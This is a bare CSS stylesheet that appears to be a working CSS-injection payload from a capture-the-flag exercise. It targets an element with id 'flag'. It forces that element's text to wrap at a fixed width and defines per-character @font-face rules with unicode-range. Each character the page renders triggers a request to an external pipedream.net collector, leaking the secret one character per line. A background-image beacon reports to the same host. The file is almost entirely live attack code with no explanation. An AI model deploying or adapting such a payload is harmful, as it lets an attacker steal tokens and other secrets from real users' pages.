body{background-image:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=W35')}
#page{content-visibility:hidden;animation:unveil 0.001s 0.3s forwards}
@keyframes unveil{to{content-visibility:visible}}
#flag{display:block!important}
#flag{font-family:p97w35,p98w35,p106w35,p112w35,p115w35,p121w35,p122w35,p48w35,p49w35,p52w35,p53w35,p55w35,p125w35,monospace;width:35ch;white-space:pre-wrap;word-break:break-all;overflow:visible}
#flag::first-line{font-family:monospace!important}
@font-face{font-family:p97w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=a_W35');unicode-range:U+0061}
@font-face{font-family:p98w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=b_W35');unicode-range:U+0062}
@font-face{font-family:p106w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=j_W35');unicode-range:U+006A}
@font-face{font-family:p112w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=p_W35');unicode-range:U+0070}
@font-face{font-family:p115w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=s_W35');unicode-range:U+0073}
@font-face{font-family:p121w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=y_W35');unicode-range:U+0079}
@font-face{font-family:p122w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=z_W35');unicode-range:U+007A}
@font-face{font-family:p48w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=0_W35');unicode-range:U+0030}
@font-face{font-family:p49w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=1_W35');unicode-range:U+0031}
@font-face{font-family:p52w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=4_W35');unicode-range:U+0034}
@font-face{font-family:p53w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=5_W35');unicode-range:U+0035}
@font-face{font-family:p55w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=7_W35');unicode-range:U+0037}
@font-face{font-family:p125w35;src:url('https://eowjcwr61nsdf8j.m.pipedream.net/?c=%7D_W35');unicode-range:U+007D}